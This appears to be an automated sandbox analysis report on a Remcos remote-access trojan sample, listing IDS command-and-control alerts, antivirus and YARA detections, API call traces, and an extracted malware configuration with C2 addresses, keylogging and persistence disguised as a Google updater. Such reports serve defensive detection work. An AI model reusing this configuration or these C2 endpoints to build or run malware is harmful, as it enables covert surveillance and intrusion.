2025-01-11T20:08:06.300381+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50922	198.50.242.157	443	TCP
2025-01-11T20:08:06.302179+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50924	198.50.242.157	443	TCP
2025-01-11T20:08:06.305808+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50927	198.50.242.157	443	TCP
2025-01-11T20:08:06.310716+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50932	198.50.242.157	443	TCP
2025-01-11T20:08:06.311714+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50933	198.50.242.157	443	TCP
2025-01-11T20:08:06.312593+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50934	198.50.242.157	443	TCP
2025-01-11T20:08:06.313441+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50935	198.50.242.157	443	TCP
2025-01-11T20:08:06.317840+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50939	198.50.242.157	443	TCP
2025-01-11T20:08:06.321553+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50942	198.50.242.157	443	TCP
2025-01-11T20:08:06.322477+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50943	198.50.242.157	443	TCP
2025-01-11T20:08:06.323953+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50944	198.50.242.157	443	TCP
2025-01-11T20:08:06.327231+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50947	198.50.242.157	443	TCP
2025-01-11T20:08:06.330909+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50951	198.50.242.157	443	TCP
2025-01-11T20:08:06.336787+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50956	198.50.242.157	443	TCP
2025-01-11T20:08:06.339408+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50958	198.50.242.157	443	TCP
2025-01-11T20:08:06.345176+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50962	198.50.242.157	443	TCP
2025-01-11T20:08:06.346211+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50963	198.50.242.157	443	TCP
2025-01-11T20:08:06.401786+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50978	198.50.242.157	443	TCP
2025-01-11T20:08:06.416169+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50982	198.50.242.157	443	TCP
2025-01-11T20:08:06.419009+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50984	198.50.242.157	443	TCP
2025-01-11T20:08:06.420521+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50985	198.50.242.157	443	TCP
2025-01-11T20:08:06.424936+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50988	198.50.242.157	443	TCP
2025-01-11T20:08:06.428324+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50989	198.50.242.157	443	TCP
2025-01-11T20:08:06.441841+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50994	198.50.242.157	443	TCP
2025-01-11T20:08:06.443885+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50995	198.50.242.157	443	TCP
2025-01-11T20:08:06.445412+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50996	198.50.242.157	443	TCP
2025-01-11T20:08:06.451076+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50999	198.50.242.157	443	TCP
2025-01-11T20:08:06.460301+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51005	198.50.242.157	443	TCP
2025-01-11T20:08:06.464923+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51008	198.50.242.157	443	TCP
2025-01-11T20:08:06.469885+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51010	198.50.242.157	443	TCP
2025-01-11T20:08:06.543839+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51032	198.50.242.157	443	TCP
2025-01-11T20:08:06.545085+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51033	198.50.242.157	443	TCP
2025-01-11T20:08:06.556801+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51039	198.50.242.157	443	TCP
2025-01-11T20:08:06.559735+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51041	198.50.242.157	443	TCP
2025-01-11T20:08:06.572882+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51047	198.50.242.157	443	TCP
2025-01-11T20:08:06.581798+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51051	198.50.242.157	443	TCP
2025-01-11T20:08:06.591571+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51054	198.50.242.157	443	TCP
2025-01-11T20:08:06.595642+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51055	198.50.242.157	443	TCP
2025-01-11T20:08:06.633380+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51065	198.50.242.157	443	TCP
2025-01-11T20:08:06.680123+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51084	198.50.242.157	443	TCP
2025-01-11T20:08:06.691239+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51089	198.50.242.157	443	TCP
2025-01-11T20:08:06.737110+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	51103	198.50.242.157	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DB5rQYsfd6.exe

Avira: detected

Antivirus detection for URL or domain

Source: apleegodfivem.ddns.net

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\install.vbs	Avira: detection malicious, Label: VBS/Runner.VPD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Avira: detection malicious, Label: BDS/Backdoor.Gen

Found malware configuration

Source: DB5rQYsfd6.exe

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["198.50.242.157:443:0", "apleegodfivem.ddns.net:443:0"], "Assigned name": "paydaytry", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "GoogleUpdate.exe", "Startup value": "ChromeUpdater", "Hide file": "Disable", "Mutex": "Attempt-S4A0CI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "GoogleDat", "Keylog folder": "bootdata", "Keylog file max size": "0"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

ReversingLabs: Detection: 89%

Multi AV Scanner detection for submitted file

Source: DB5rQYsfd6.exe	ReversingLabs: Detection: 89%
Source: DB5rQYsfd6.exe	Virustotal: Detection: 84%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: DB5rQYsfd6.exe, type: SAMPLE
Source: Yara match	File source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
Source: Yara match	File source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DB5rQYsfd6.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	0_2_004315EC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	10_2_004315EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D815EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_02D815EC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	15_2_004315EC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	18_2_004315EC

Source: DB5rQYsfd6.exe, 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_5492cb58-8

Source: DB5rQYsfd6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_0041A01B
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_0040B28E
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_0040838E
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_004087A0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	0_2_00407848
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004068CD FindFirstFileW,FindNextFileW,	0_2_004068CD
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0040AA71
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00417AAB
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_0040AC78
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	10_2_0041A01B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	10_2_0040B28E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	10_2_0040838E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	10_2_004087A0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	10_2_00407848
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004068CD FindFirstFileW,FindNextFileW,	10_2_004068CD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	10_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	10_2_00417AAB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	10_2_0040AC78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_02D5B28E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_02D5838E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D6A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_02D6A01B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D587A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_02D587A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D67AAB FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_02D67AAB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_02D5AA71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D568CD FindFirstFileW,FindNextFileW,	13_2_02D568CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D57848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_02D57848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_02D5AC78
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0041A01B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0040B28E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_0040838E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_004087A0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_00407848
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004068CD FindFirstFileW,FindNextFileW,	15_2_004068CD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0044BA59 FindFirstFileExA,	15_2_0044BA59
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00417AAB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040AC78
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	18_2_0041A01B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	18_2_0040B28E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_0040838E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_004087A0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	18_2_00407848
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004068CD FindFirstFileW,FindNextFileW,	18_2_004068CD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	18_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	18_2_00417AAB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	18_2_0040AC78

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

0_2_00406D28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49734 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49739 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49757 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49735 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49737 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49740 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49766 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49765 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49746 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49762 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49763 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49807 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49769 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49774 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49777 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49788 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49778 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49748 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49773 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49802 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49792 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49771 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49803 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49824 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49732 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49815 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49755 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49791 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49842 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49784 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49840 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49783 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49822 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49793 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49761 -> 198.50.242.157:443
